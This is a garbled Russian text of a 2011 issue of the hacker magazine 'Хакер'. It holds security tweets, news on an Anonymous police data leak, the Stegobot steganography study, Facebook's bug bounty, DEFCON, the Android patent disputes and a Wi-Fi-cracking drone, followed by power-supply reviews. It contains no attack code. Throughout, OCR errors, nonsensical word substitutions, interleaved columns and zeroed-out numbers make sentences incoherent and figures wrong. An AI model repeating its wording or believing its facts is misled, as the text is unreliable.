живает удивления . А в целях любопытных ссы­

хуй остовериться, почто ваша сестра куверта .

лочка, в духе сие было,- Ьit . ly/gjJzZD .

Введ ите ваше р еальное имя,

Гclpentestit:

боец телефона , а в свою очередь выпуск социаль н о­

С п исок SSL-сканеров для того пен­

го страхования сиречь стриптиз паспорта , впоследствии

тестеров! http : UЬit . lv!oBjSгT.

что нажмите кнопку " Я особа "» .

Гcltodb:
Различие в обществе известными
х акерами да настоящими зна­
ме н итостями на том, аюшки? зна­

ГciOxcharlle:

менитости на ооб ще-то знают, вроде добро бы бы

Читаю доклады.

притаиться вежливыми.

01

Комментарий:
Иногда во тв итах б ы вает име н однако то, ась?

твоя милость ищешь! П отому так точно нны й твит равно п что до п ал сюда.

Р ецензирование - сложная
штука! Я могу благословить чуть

ГclstrOke:

05% тем. Моя теорема -сделать RSA «те х ­
нической» на зтом году, а ...

packetstormsecurity.com +
explo1t-db.~om + FD + Dai ly
Гclxme:

Dave + metasp loit "s change log

0!1!1

Комментарий: Г ражданин Чарли

Ставлю физиологический сервер ...

-

Миллер жалуется сверху темы докл чудовищный

Какая скука! Вива виртуали-

-тяжело свершить круче.

с целью одной с самы х уважаемых конфе­

0!1!1

Комментарий:

ренций лета -

-

Милворма давным-давно полоз нет, да е го созда­

RSA. Организаторы выбра­

тель (0str0kel дав н насчёт забил сверху текущий пр оект.

ли Чарли, с целью поотбирать технические

Гclkevlnmltnlck:

рассказ ы равно произвести конфу « живее>>.

А ресурсов со вместе с пл ойтами, равно как на сегда, мно го .

Только зачем приземлилея на Лас­
Вегасе!!!

Гclnlckdepetrlllo:

0!1!1

Комментарий: А га, получи и распишись п оминаю, зачем

П по отношению ходу, толпа забывает, ась?

-

новобрачный БлэкХат равно Дефкон насчет ш ел,

лакомиться мука ш ая в один из дней н ица в ряду

где, кстати, было РЕКОРДН О Е контингент

TelePгesence [ . ..] во кл ючает

«вз л омать >> шифро во ание равным образом

нате ш их ребят! И Митник - затем же.

учетную из-за п ись root [и n а роль] ,

Опять фей вместе с движение л м! «Сервер

Cisco

« огибать >> его .

VU?EN

ГciVUPEN:

JЯ следовать платил

Java 0 те п ерь доступн а. Все моду­
ли имеют поддержку ASLR, а зна­
чит, обижать ASLR не без; через Java

испытание держи п роникновение , да на се , ч т относительно

ROP еще невыгодный выйдет. Поздравляю O гacle/Sun!

XAICII8 00/153/2011

00 тыс. баксов ради

пишущий эти строки получил , - сие ради n уск сканера

Вау!

010 Ed i toг тепе рь очищать равно чтобы
05 Х. Довольно быстро ми

Nessus сертифицированным п в отношении CISSP товари­

Мае

щем . http://t . co/PehгnZn .

вооб ще малограмотный нужна хорэ винда!

nt

MEGANEWS

НЕДАВНО В КИТАЕЗАКРЫЛИ 02ЛИПОВЫХ МАГАЗИНААРРLЕ , которые на точности копировали официальные бути ко равным образом Apple Stoгe .

«АНОНИМУСЫ»

АУДИОСИСТЕМА
EDIFIER С5

ДОБРАЛИСЬДОПОЛИЦИИ

НАБОР КАЧЕСТВЕННОЙ 0.1 И 0.1+ АКУСТИКИ ДЛЯ
КОМПЬЮТЕРА
родук ц ия Edifieгyжe бессчетно полет пользуется на России
зас л уженной п опулярностью, позтому мь1 далеко не
могли проследовать мимо новой модели- С5 . Новинка
представляетсобой мультимедийнЬiе колонки

0.1

да

0.1 +

lc внешним уси л ителем!. Система осна щ ена 0-дюймовЬiм
сабвуфером равно двухполоснЬiми сателлитами вместе с экра н иро­

ваннЬiми 0.5-д юймовЬiми динамиками равно 0/4-дюймовЬiми
ШеЛКОВЬIМИТВИТТерами.

Внешний мегафон может схвастнуть встроеннЬiми

FМ-тюнером, USВ-разъемом равно 00-кардридером . Вп олне
ожи д аемо, что такое? образование умеет пр оигрЬi на ать МР3,

& РСМ

WMA

со разнообразнЬiх носителей- передвижение объединение подбор равно

каталогам осуществляется вместе с через пульта дистанцион­
ного у п равления.

Техниче со кие характеристики новинки:

ВЬiходная мощность:

RMS 0Wx 0 + 05Wx 0ITHD=10%I

Соотношение сигнал- ш ум: тмg5 д Б IAI
Искажение :
охоже, проворно довольно не задавайся сказать, кого снова НЕ ха для ­
нули Анонь1. Кампания

AntiSec набираетоборотЬI,

равно пока что очередьдошла накануне п олиции С Ш А . Атака
бЬiла совершена бери

07 веб-ресурсов,

по большей части возьми

сайтЬI ш ерифских управлений на штатах Луизиана , Арканзас ,

Миссисипи да Канзас. П касательно неподтвержденнЬiм даннЬi м, по­
страдала в свой черед полицейская академия равным образом депо даннЬiх не без;
информацией что касается заключеннЬiх . Как бЬI ведь ни бЬIЛО, во сумме

Входное сопротивление:

слил бери Pastebln

НизкочастотнЬIЙ динамик: В дюймов

эмпирика что до членах

nолиции BART IBay
Агеа Rapid Tгansitl .
Информация об име­
нах, адресах равно счетах

000 поли­
цейских оказались
больше нежели

во открытом доступе .

Однако, возможно, для

хакерам ванька-встанька алосьзаполучить паче 0О гигабайттрофейнЬIХ

этoмyAnonymous"ы

д аннЬiх , промежду котяра орЬiх бЬiла различная сведения что до паче

неnричастны

нежели

0.5%

Тем временем один человек

ваннЬIЙ,

0ОК Dhm

СреднечастотнЬIЙ громкоговоритель :
ваннЬiй,

0210 мм! , зкраниро­

0 Ом .
0.5 дюйма 092 мм!, зкраниро­

0 Ом.

ВЬi сокочастотнЬiйдинамик:

03 мм.

утнапиштим мембраной, зкранированнЬIЙ,
Сабвуфер:

из шелковой куполь­

0 Ом .

05 Вт.

0000 сотрудников правоохранительнЬiх органов. Утекло

все-логинЬI, шаг роли, гостиница социального от тр ахова ни я,

даннЬiе банковских карт, адреса равно инда электроннЬiе

письма.Разумеется , прятатьдобЬiчуотсетевойобществен­
ности хакерЬI далеко не стали да ВЬiложили по сию пору д аннЬiе на открЬIТЬIЙ

д осту п . Д ополнительно репутацию п олиции п одпортил равно оный
факт, что такое? у многих сотрудников обнаружились ненадежнЬiе ,

простЬiе парали lобЬIЧНЬiе словарнЬiе слова, их имена иначе говоря
гостиница значков!. Кстати, <<Ано н имусЬI» заявляют, почто слив
инфь1- расплата после н едавний лишение свободы

04 человек,

обвиненнЬiх

на участии на атаках, совершеннЬiх на декабре равно нарушивших
деяте льно сть

PayPal . Словом,

<<Ано ним побег отнюдь не прощает>> да н е

ленится об этом напоминать.

ГРЯДЕТМОБИЛЬНАЯОСОТ

MOZILLA. На форуме в целях
разработчиков Mozilla
появилось извещение насчёт том,
сколько на стане компании кипит

усилие по-над проектом Boot
to Gecko. Основываться ОС
короче в движке Gecko, кото­

рый используется равным образом на других

0 МЛН ПРЕДУПРЕЖДЕНИЙ

ТРИ САМЫХ ПЛОХО ЗАЩИ­

продуктах Mozilla: так

выдает повседневно общество

ЩЕННЫХ социальных сети,

во Fiгefox"e равно Thuпdeгbolt"e.

Google, предостерегая по отношению вне­

пользующихся наибольшим

Акцент на Boot to Gecko склифосовский

дрении вредоносного ПО для того

« успехом» у мошенников , ­

сделан для веб-приложения,

приближённо 000 млн людей .

сие

написанныесприменением

Facebook, Twitteг да
MySpace, сообщает компа­

HTML5.

нияSорhоs .

012

ХАКЕР

00 / 053/ 0011

MEGANEWS

ВЫХОД IPAD 0 ОТЛОЖЕН накануне следующего года, сообщаетиздание DigiTimes.

FАСЕВООКНАГРАДИТХАКЕРОВ
КРУПНЕЙШАЯ НА ПЛАНЕТЕ СОЦСЕТЬ УЧРЕДИЛА
НАГРАДУЗАПОИСКУЯЗВИМОСТЕЙ

А ЕСЛИ
СТЕГАНОГРАФИЯ?
ИНТЕРЕСНОЕИССЛЕДОВАНИЕ

ОБ УХИЩРЕНИЯХ В БОТНЕТАХ
руппа программи стов с Института информа­

ционны хтех нологий г. Индраnрастха !Индия! равно
Университета Иллинойса ICШAI об п уб ликовала до
адресу aгxiv. o гg/abs/1107.2031 результаты любопытного
исследования, доказывающего , почто созда ни е стега н огра­

фического ботнета, передающего информацию чрез со ци ­
альные путы , этодовольно nерсnективная равным образом после ни мательная

штука. На каждый прецедент скажу, аюшки? сте ганография- сие
бездна премудрости в рассуждении скрытой передаче информации порядком сохранения на
Сначала Facebook
организовал соб­
ственный хакерекий

тайне самогофакта передачи. Исследователи рассматри­
ваюттеоретическую программ у Stegobot, которая, попав

в комок nьютер пользователя !обычным путем- наnример,

конкурс, в настоящий момент
поощряет хакеров

...

кликом по части нехорошей ссылке!, ведетсебя далеко не положительно обычно.

Так равным образом прежде хакерекой
конференции
им . Марка под боком

Вместопередачиконфиденциальныхданныхнаnрямую,nо
старинке, Stegobot выжидает момент, в некоторых случаях жертвоприношение начнет
обманывать во Сеть какие -либ относительно изображения, равно зашифровы­
ваетукраденные nарали да гостиница банковских карт на графи­

ледуяnримерудругихкруnныхигроковрынка ,с оциальнаясеть

ческие файлы из nомощью стеганографии! К примеру, одна

Fа не без; еЬооkрешилазаинтересоватьnотенциальныхловцовбаговрублем .

залитая во Facebook JРЕG-картинка от разрешением 020х720

Точнее , долларом. Цукерберг равным образом комnания учредили сnециальную nро­

14 для селов !максимальный получай Facebook размер! вмещает по
00 Кб информации кроме видимых последствий к качества

грамму выnлат, nолучившую заглавие Secuгity Bug Bounty. В рамкахданной
nрограммы , люди, нашедшиеуязвимости равно ба г да на сервисах со циальн ой сети,

изображения. Когда такие зараже нные картинки просмо­

nолучатзаэтоденьги.Сколько?Зависитотсерьезностидырки.Стандартная

тритпользовательдругогокомпьютера,инфицированного

вознаграждение равно 000 долларам , тем не менее руковод ство Fa cebook сулит равным образом побольше

Stegobot"oм, сведения п ереза пишется во его фото. А все же

кру nн ое расчёт ради серьезныеуязви мости. Точные средства nри этом

на фолиант а Fa cebook"e чтобы сего хватит за глаза едва растворить оборона ­

неназываются,цен~таксказат~договорная.Основноетребованиекуязви­

обложка другого юзера, приблизительно в духе на сацсети работает предвари­

мостям- шанс вместе с их nомощью обновить nереанальные материал nоль­

тельная погрузка изображений .

зователей Facebook или — или но построить настройки безоnасности системы. Как

Исследователи просчитали равно пусть даже смоделировали

nравило , сие касается ХSS-уязвимостей, на часть числе уязвимости CSRF/XSRF, равным образом

ра не без; пространение информации помощью Stegobot для около мере

внедрения nроизвольнога nрограммног а стих . Разумеется, nрограмма выплат безграмотный

фота хости н га Flickг. Они эмулиравали интернет изо 0200 связан­

рас пр остраняет со ваш покорнейший слуга держи уязвимости на сторонних приложениях, используемых alias

ных дружище не без; другом аккаунтов, подле этом воспроизведя частоту

исnользующих Facebook, а тоже возьми уязвимости , вызывающие отрицание через обслу­

выкладывания фотографий . Спрятанные во изображения х

живания другими словами рассылку спама от применением социальной инженерии . Сообщив

документация nопали на щипанцы хозяев гипотетического ботнета

в отношении найденной дырке, подобает предоставить сотрудникам

бог быстро. То снедать сие работает.

Facebook миг чтобы исnравления

проблемы да неграмотный суматошиться обнародовать найденные недостатки. Ну равно уже чтобы nо­
лучения ден ег нужно затрачивать на стране, отнюдь не попадающ ей по-под юрисдикцию США .

Кроме того, всегда сие позволяется пускать в дело равно на обратном на­
пр авлении . Хозяева такого ботнетамогут вметнуть во интер­

Сравнения чтобы н апомню, сколько Mozilla без дальних слов готова ради заплатить вслед за уязвимос ть 0

пропал картинки из после шифров анным на них исполняемым кодом, равным образом

твоя милость вместе с . грин ов, а Google-yжe 0133,7. << Кор nорация добра >> , в лад , поуже потра­

ахти борзо сей шифр попадет получи и распишись зараже нные компы, раздав

тила получи и распишись « оnлату ба го во >> больше 000 ОООдолларов . Чт о-то жа днич ают Ц укерберг равно

им соответствую щишки е << nриказы >> .

сотоварищи.

ФЛЕШКИ- НАСТОЯЩЕЕ ЗЛОДЛЯ КОРПОРАЦИЙ
Бот-мастер

Социальная

"Оо/о ОРГАНИЗАЦИЙ ИМЕЮТ

вентерь

[facebook]

ВОБОРОТЕОКОЛО50000USВ­

УСТРОЙСТВ, 00о/о- ОКОЛО
000000УСТРОЙСТВ.ПОТЕРЯ

ФЛЕШКИ С ВАЖНЫМИ ДАН­
НЫМИ ЧРЕВАТА УЩЕРБОМ
ПОЧТИ В 0,5 МЛН ДОЛЛАРОВ!
ХАКЕР

00 / 053/2011

___. Украденные

___. Команды

___. Малварь

исходняк

013

MEGANEWS

РОССИЙСКАЯ КОМАНДАВПЕРВЫЕ ПОПАЛА В ФИНАЛ DEFCON CTF. Подробности получай стр. 02

ПАТЕНТНЫЕ ВОЙНЫ

DEFCON 09

ПРОТИВОСТОЯНИЕ GOOGLE И APPLE/MICROSOFТ НАБИРАЕТ ОБОРОТЫ

КРУПНЕЙШАЯ В МИРЕХАК-КОНФЕРЕНЦИЯ
ПРОШЛА В ВЕГАСЕ
а традиционно истечение августа ознаменовался nро­

шедшим вЛас-Вегасе

DEFCON . Если твоя милость безграмотный знаешь,

в чем дело? сие такое, ведь журнал, низина жно быть, попал ко тебе

на грабки в области ошибке. Конференция каждый год проводится на
Вегасе равно соби раеттысячи персона со общем мира. Что забы ли
дальше постоянно з ти гоминидэ ? Они nриезжают получи и распишись одно с крупнейших
хаке рски х собраний получай нашем дворняжка е, идеже помимодокладов

каждогодно nро ходят равно самые знаменитые хакерекие lwh itehatl
соревнования Capture The Flag . Что примечатель но, во этом
году nрограмма конференции пополнилась курсами DefCon

Kids, рассчитанными бери дет ей от8до 06л ет, которые хотят
узна ть, что со вор нравственными взломщиками. Детишек
учи ли вскрывать замки, «вз ламывать

Google>> равно использо­

вать шифрованн ое общение.
Н насчёт п е р ей дем ко взрослым. Описыватьдоклады равным образом пре­
зентации безграмотный со танем , для ним твоя милость можешь самодостаточно при­

об щить ся соответственно адресу defcon.org. А вотсамое прикольнее собы­
тие конфы назовем. Многострадальный презент по части н Барр , теревшийся

ге неральный глава HBGary, nри сут от твовал получай конферен­
цииnолутайн~таккакnолучилnисьменноеуведомлениеот
ы во что такое? бы ведь ни стало слышал что касается часть , что-нибудь во за знак ни е месяцы

адвокатов

вокр у г мобильных усишко тройств нате платформе Android

выудить оценка ебный эмбарго получи и распишись е го выст уп л е ние . В итоге Барр

равно их производит е лей щуп лят нешуточные страсти.

для Samsung"y да Barnes & NоЫе, иски Apple ко Н Т С" у равно Motorola

безграмотный учас твовал во следовать пл аниро ванн ой шаг н е ли «W ho everf igh ts
monsters: confro nting Aa ron Ваг г, Anonymous and ourse lves»
равно дискуссию насчёт LulzSec "e, Anonymous"e, а в свою очередь об отношении

равным образом приблизительно дал ее. В вместе с вя зи со сим на СМИ еще века заговорили в отношении

американскихвоенныхккибервойнетолькослушал.

т

Стоитхотя бы воспроизвести судебные иски компании Microsoft

HBG ar y, на котором гурьбой ло сь, что-нибудь они намерены

возьми не присаживаясь суп х nатентны х войнах !такая тактика, на общем-то,
никак не н ова ! , все в эту пору да на Google на виду у всех будто об книжка а
самом. Главный законник Google ДэвидДраммонд на офици­
альном благе компании заявил, аюшки? Microsoft, Apple равным образом Oracle

организовали визави Android"a целую камnанию, целью
которойявляетсявзвинтитьценынаустройстваназтой
платформ е . Как твоя милость nонимаешь, основным оружием, которое

конкуренты да вместе с польз устроенность nротив Android "a, являются патен­
твоя милость . Суть сво дится для тому, в надежде изловить Google во нарушении
этихсамыхnатентовизаставитьпроизводителейустройств

держи Android"e выnлачивать отчисления патентодержателя м.
В со умереть и неграмотный встать ем посте Драммондособо подчеркн ул , сколько Google

0000
патентов а поуже что-л. делает

приобрела бражка
Gооglеукомпании
IBM, причемдалеко
малограмотный по сию пору с нихсоот~

ветствуютпрофилю
компании. Просто на
наши Век Петра у кого

вяще патентов, оный
да получше

нам ере в следовать щищать платформ у Android. Д ействите льно ,

время бы уже, тем отнюдь не менее товарищество Apple сделано д оби ла сь временного
судопроизводство еб ного запрета бери nродажи nланшета Samsung GalaxyTab

00.1 держи территории стран Ев росаюза !правда, е го ко моменту
публикации еще сня ли! .

СЛУЧИЛОСЬ НЕВЕРОЯТНОЕ И
УДИВИТЕЛЬНОЕ --компания

Adobe, откуда Flash уж давненько
стал неотъемлемой фрагментарно
Сети, наконец-то поддержа­
ла альтернативное ПО на
создания веб-анимации вместе с
через открытых стан­

дартов, начиная

HTML5,

УСПЕШНОГО И ИЗВЕСТНОГО

ОФИЦИАЛЬНАЯ БИО­

CSSЗ да JavaScript. Бета­

хакера-самоучку наняла держи

ГРАФИЯ главы Apple Стива

модифицирование программы

работу шарашка Samsuпg.

Джобса выйдет раньше,

Edge ранее вышла на свет, рас­

Стив <<Суапоgеп» Кондик

нежели планировалось,-

пространяется бесплатно,

известный вроде верховное существо про­

во ноябре

да ее уж не возбраняется завалить из

шинки CyaпogenMod.

получит заголовок <<Steve

сайта

011.

Adobe Labs.

Adobe

0011

г. Книга

Jobs:A Biogгaphy».

ХАКЕР

00/153/2011

MEGANEWS

ПЕРВЫЙТРОЯНДЛЯ HOBOГOANDROID"A 0.3 ( G i ngeгMasteг) обнаружили во китайском Andгoid Maгketplace .

ХАКЕРСКИЙ БЕСПИЛОТНИК
КАК ПОСТРОИТЬАРОН И С ЕГО ПОМОЩЬЮ ВЗЛОМАТЬ ТО,
Ч ТОН ЕДОСТУПНОСЗЕМЛИ

н

а конференции

BlackHat исследователи

Майк Тз сси да Ричар д Перкинс

представили вторую версию беспилотного аппарата Wiгelessдeгial

Suгve i llaпce Platfoгm (беспроводной платформы воздушного наблюде­

ния) . Н а п омним, ч т что касается их стержневой д ран, по отношению котором пишущий сии строки писали година наза д , был в силах обегать
т ер риторию по части заданному маршруту равно вербовать информацию что касается WiFi-ceтяx. За
основутогда была взята конверсив МиГ-23 , для которой добавили камп

РС

Via Epia Pico ITX
(500 М Гц Via С7, 0 Гб RAM со Backtгack 0 в борту) равно наладили систему автома­

тического пилотиро на ания Aгdu P i l ot. Система п одд ерживала связ ь не без; н аземной

базовой станцией во режиме реального времени через РРР-оvе г -SSН­
тоннеля . Со другой версий беспилотника Тэсси да Перкинс зашли следом . Взяв после
основу остатки военного беспилотного самолета, они построили конверсив весом

04 фунтов (6,35 для г ] равно д линой во 0 фу-ты т ов (183 см ) . Е е оснастили Via Epia PX5000EG Pico
ITX РС (500 М Гц Via С7, 0 Гб RAM), же теперьуже подуправлением Linux BackTгack 0.
Также во комплекте следующий версии вошла nрограмма пользу кого брутфорса со словарем
во

040 млн

слов. Благодаря этомуWАSР стал станется малограмотный лишь только пускать в дело от­

крытые хоте поты, а да реализовывать ряддействий про взлома закрытых WiFi-ceтeй.
Дран связывается (: О станцией с помощью 0G-донгла, да та, на свою цепь ,
осуществляет ревизия надо моделью подле nомощи

Google E aгth равно открытого

ПО

на автопилота. Та но базовая ям собирает данные, полученные через драна ,

да при помощи

VPN

nерена п равляет их возьми сервер, который-нибудь ловок взбутетенить паче

сложные показатели да выполнить сильнее слож н ые вычисления. Беспилот н ик в свою очередь
получи у чился сидеть на качестве мобильной GSМ-станции . Совершенно неза-

метно с целью абонента некто сnособен nринять получай себя GSМ -сое динение равным образом вместе с через

0G

модуля переадресовать его

no Vo iP. Таким образом, звонок далеко не оборвется равным образом его
SMS фиксируются кайфовый встроенной памяти

довольно на озможно записать. Раз г оворы равно
аnпарата, из какой семьи формат равен

02 Г б.

Немаловажный факт-самолет работае т с электрического двигателя, таково
что-то различить его почти что невмоготу уж сверху расстоянии примерно

05 м.

И пусть бы пра­

Н а n об ст ро йку, тести рова ни е равным образом у сове р ше н не без; т вов а н равным образом е эт ого апnара та у
n е р ки нса равно Тэсси ушло

0300 ча со в. Ден не персона — змея ные вло ж ения разработчиков
0190 долларов

б ы л равным образом н е та для во е л ики, равно как м насчёт жн что касается nод догадливость а ть: они соста вили

самодива Федерального авиационного агентства из-за п рещают полеты таких устройств

получи и распишись высоте побольше

000 футов [122 м), дра н , построен н ый Тз сси да Перкинсом , может
00 000 фут что до во [6096 м) .

взлетать для высоту больше

Применитыакой аnпарат позволено весть п о-разному: кайфовый хорошо равно неграмотный куда . Так,
некто ловок реализовывать об п паяц ц ии

no nассивному прое л ушиванию

+--------

беспрово д ­

ных сетей равным образом их взлому, спуфингу сотовых вышек, замечать из-за сотовыми телефо­
нами равно перехватыватыелефонные разговоры, эксфилырироватьданные иначе

nросто выполнять видеонаблюдени е.
Официальный сайт проекта по-nрежнему в ходится п об адре су гabЬit-hole . oгg .

Там твоя милость най д ешь м н ожество фотомордочка гр афий, видео, п резе н та ц ии не без;

DEFCON 09, а в свою очередь п одробный раздел атом,

Black Ha t 0011

равно

в духе собратьтакую а штуковину вместе с вои­

0

ми руками . По словам П е ркинса , <<Чтоб ы образовать такую модель, далеко не нужна научная
сте пень >>. Кроме того, безвыездно комплектующие идетали не запрещается безвозбранно обрести во
ма г азине .

XSOUND OTWINSTON XS

клуба не без; модным дизайном равным образом интерактивным

Этим в летнее время

контентом, располагались chillout-зoнa, бар­

WinstonXS nредставил экс ко лю ­

зивную nлощадку XSoundBa г держи леген­

ная сто йка не без; необычным кокте йльным разблюдник равным образом

дарном британском ореnа i г-фестива л е

инно на аци некто н ое простран ство 00-mappiпg, идеже

Winston Global Ga t heгing Fгeedom Music,
какой состоялся 06 июля 001 0 лета nод
Санкт-Петербургом. Более 00 000 ч еловек

всякий был в состоянии рисковать себя на роли

собрались нате данное мероприя т ие, ради

н а танцполы лучшихроссийских клубов. В новом

прослышать се т ы ото лучш их диджеев решетка .

DVJ.

После остановки для Winston Global Gatheгi п g
Fгeedom Music веч еринки XSound возвращаются

кл б

м.сноне ~оundпредставиткиловатты

ХSоundВагна ходилсявса м об м эnицентре

фестиваля. Внутри двухэтажного объекта, \

выполненного во эстетике настоящего ночно\о

арт да стов да диджеев,за расписанием которых

не запрещается шпионить в сайте www.winstonxs. гu.

~ МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖдАЕТ:

W

КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ

FERRUM

защитник Горбу нов

...

П ТАИТЕСЬ
ПРАВИЛЬНО!
ТЕСТИРОВАНИЕБЛОКОВПИТАНИЯ
CTAHДAPTABOPLUSGOLO

Что нужнодля сборки продвинутого игрового компьютера? Качественная мате­
ринская платеж , теперешний процессор, сильнее п амя ти , видеокарта помощнее,
прыткий да уемистый жестокий диск? Несомненно, безвыездно сие следует являться упако ­
вано на живописный равно уместительный фюзеляж . Но имеет принципиальное значение отнюдь не забывать, который главне й ший ком­
понент будущей системы- сие секция питания. Именно некто хорошенького понемножку одарять энергией
твоего игрового « монстра». Мощные конфигурации отличаются повышенными
требованиями для питанию, особенно сие касается прожорливых видео карт, а равным образом

связок SLI да CгossFiгeX . Отсюда следствие : придвигаться ко выбору БП желательно от умом.

МЕТОДИКАТЕСТИРОВАНИЯ

н аблюд аем реальныезначе н ия н ап р яжений п оли­

В се ис пы туемые б л оки п равным образом тания пр ош л да бревно т ы в

ниям , которыеиза п исываем . Зат ему на е л ичи на аем

вместе с те нд е D-R AM DB S-22 00 ото килоом п а ни равным образом FS P. Ко н ­

п что касается тр ебл яемую мо щ носишко т ь н а л иниях + 02V д относительно 000 Вт равным образом

со тр ук тивн оо н помогите т что до ити з ко об л насчёт д окср а з ъ емам и,

п насчёт вто р яем п ро цессза н ово .Пр е д е л а ми относительно г р а н ич е­

камо п од для л ю ч аются ко а бе ли по отношению т БП , н агрузоч н об г относительно

ни йяв л яютсязначениямакс равно ма льн ойкомбиниро­

б л ока, ох л хоть д аемо го пр равным образом п омощ равно вент гиттия ято р ов,

на а нн ой н агрузкиукаж прежде гоизб л оков п ита н ия.

п ерек л ючате л ей дл мы ваша милость со т а вл е н иясилытокапо

Резул ьтаты ис п ытаний -это пр что до ц ентные по части т кло ­

Cooler Masteг Silent Рго Gold 000W
Corsair Professional Seгies Gold АХ750
ENERMAX MODU87+ BOOW

ос н об вны м лини ваш покорный слуга м равным образом п а н е л равно равно нд икации н а п ряже­

н ения в п ряжения п по отношению каждой иэ осно во ных л равным образом н ий:

FSP AURUM GOLD 000

н ия . Пр равным образом п омо щ равным образом д а нн что до го сте нд а мож н насчёт н агрузить

+З,ЗV, +5V, +12V. Ч ем ме н ьше крат н ица меж ду

FSP AURUM GOLD 000

б л ок волокно н ия мо щ ност ь ю д об 050 Вт.

заме р ен н ым да идеальным значе н иями н апряже­

Тесты пр овод да л ись п осле дую щей схеме .

ния, тем не чета : значит, устройство число «пи» тания эффек т ивно

П е р ек л ючателямиустанав л иваем д ля линий+ 02V

рас п ределя е< нагрузку да н е пр оседает. Также оце­

п ото ребляемую мо щн восток ь, ра вную 000 В т. Д алее

ни во ались:комплектпоста во ки,оснащениетеми

в дальнейшем д в рассуждении во ате л ь н насчёт п ов ыш аем н агрузку возьми л равно н да мы х

иначе иными разъемами про п по отношению д ключения, ярус

+ З , ЗV равным образом +5V вместе с ш а гом 00 Вт. Н а п а н е л равным образом да нд ика ц ии

ш умаинаг р евкорпусабл окапи т а н ия .

016

Thermaltake Toughpower Grand 050W

ХАКЕР

00/153/2011

Пит айтес ь пр ави льн касательно !

COOLER MASTERSILENT
PROGOLD700W
ачинаем не без; блока nитания Silent Рго Gold 000Wот комnании
Сооlег Masteг. Принадлежность для золотому сертификату

00 PLUS. Блок nитания модульный равно оснащен встроенным
хвостом с nр аводав от разъемами 00+4-nин на материнской nлаты,
0+4-nиндляnроцессораи6-nиндлявидеокарты . Комnлектпоставки

включаетвсе другие кабели чтобы nитания комnонентов системы,
уnакованные на тщательный чехол, изрядно стяжек-лиnучекдля nро­
агиасма в, креnежные винты, инструкцию да декоративную наклейку.

Мощность Silent Рго Gold 000W составляет 000 Вт, демонстрированный макси-

мальный гумно согласно линии+ 02V может добираться 06 А 0672 Вт]. Охлаждается

01>

установка nитания nри nомощи

020 мм вентилятора вместе с автоматическим уnрав ­
лением. П насчёт результатам исnытаний Silent Рго Gold 000W nр одемонстри­
ровал nолную устойчивость умереть и никак не встать всех режимах нагрузки.
Максимальные отклонения nоказателей до контуры +З,ЗV достигли
едва

0%, а соответственно каналам +12Vи +5Vуложились во 0%. Все время, nока шли

тесты,шумотвентилятораблокаnитанияоставалсяумеренным,даже

низким. Сам БП н а ~щуnь был чутьтеnлы м, да н е сильнее того.

CORSAIR PROFESSIONAL
SERIESGOLDAX750
гofessional Seгies Gold АХ750 серия выбивается с нашей
nафосной комnании своим строгим, аскетичным видом. Этот
секция nитания интересен nрежде сумме тем, ась? дьявол nолностью

модульный: nравадов с него безвыгодный стало по отношению ко всему никаких , лишь разъ­

емы. АХ750 будь по-твоему на комnлекте из набором кабелей l заботливоукутанных
на кобура получи лиnучке], инструкцией, винтиками равно стяжками к nроводов.
Часть кабелей ISATA да Molex] сделана nлоскими, как бы да у nр е дыдущего
БП отСооlег Masteг. В nроцессе nодключения кабелей да мы вместе с тобой столкнулись
вместе с nроблемой-nолное недостаток каких-либо nодnисей ко разъемам
в корnусе БП другими словами несмотря на то бы цветового их разделения. АХ750 сnособен

предоставить 050 Вт мо щн ости итеоретич ески обесnечить площадка на 02 А 0744 Вт]
nолинии +12V. С охлаждением тогда сnравляется 020 мм вентилятор.
Результаты тестовАХ750 говорятсами вслед за себя-nоказатели отличные.
Отклонения во nределах 0 % за во всем линиям.
Вентилятор АХ750 далеко не вращается, nока заваливание БП составляет

поменьше 00% , nри н агрузке с 00 давно 00 % дьявол работает во тихом режиме
равным образом всего лишь ближе ко 000 % начинает раскручиваться, да заслышать его
nроблематично .

ВЕНТИЛЯТОР ВОО&ЩЕ НЕ
ВРАЩАЕТСЯ, ПОКАЗАГРУЗКА &П

СОСТАВЛЯЕТ МЕНЬШЕ 00°/о
ХАКЕР

00 / 053/2011

017

FERRUM

ENERMAXMODU87+800W
ODU87+ 000W-один с лучших блоков nитания ENERMAX.

Корпус

выnолнен изо шероховатого металла да оборудован вентилятором вместе с <<з олотыми>> лоnастями . Модель, ра зумеется, модульная.

Комnлектация объемная: устав , кабе ли да саше для ним, креnеж ны е
винты , хомуты получай лиnучке, стикер, а тоже интересная единица nод названием

CoгdGuaгd, которая закре nляет ся наруже блока nитания равным образом защелкивается
держи сетевом шнуре, хуй ержи вая его ото выnадения с разъема БП. У

MODU87+
0 виртуальныхлинии +12V, в соответствии с ЗОА в каждую, nри этом
суммарная погрузка согласно ним заявлена во 092 Вт. Перейдем ко тестам . Здесь по сию пору
замечательно: отклонения на 0-2%, равно н е сильнее того . Отдельно обра тим заинтересованность сверху nоказатели очерк +1 0V, которые нефралгия шую делянка времени остаются

000W во

наличии

01>

да ни возьми лепту идеальными. При оценкеуровня шума офигенно nоло жи т ель-

ны е вnечатления остались с

040 мм вентилятора, какой-никакой работаеттихо

да эффектив но. Отметим, почто nосле выключения сис т емы лювер уже

какое-то период работает, ограждая комnоненты БП через р езко го переnада
темnератур .

FSPAURUM GOLD600
локnитанияуnакованвчернуюсзолотомкоробк~самон
оформлен во томик а цветовом стиле. Комnлект nоставки состоит
да з: инструкции , сетевого шнура , стяжекдля nроводов, креnеж­

ных винтов согласен в клейки

FSP. Примечательны скромные объем БП:
050 мм равным образом совсем нечего делать nомещается во от тан­
дартном корnусе, никому никак не мешая . Мощность FSPAURUM GOLD 000,
в качестве кого как моя персона погляжу с сверху звания, равна 000 Вт, возвещенный КП Ддо стигает 00%,
который соот во етст во уетсертификату ВО PLUS Gold. Каждая изо 0 виртуальных
во длину возлюбленный достигает всеголишь

<111

линий~2Vобесnечиваеттокдо18А .
По ре зультатам тестов прибор nитания n оказал себя возьми достойном
уров малограмотный . С одной стороны, отклонения за лини ям у него побольше явные, не­
жели у остальных исnытуемых, особенно п по отношению каналу+5V, гд е они доходят
до самого 0%. С новый -все значения укла дываются на доnустимые рамки.
Чего, nравда, н е скажешь абуровне ш ума. При интрузия утнапиштим загрузке рокот
вентилятора удобоваримо слышен. Затоте nл овые nоказатели на норме,
nерегрева н е наблюдалось .

Cooler Master
Silent Рго Gold
000W

ТЕХНИЧЕСКИЕ
ХАРАКТЕРИСТИКИ

ENERMAX

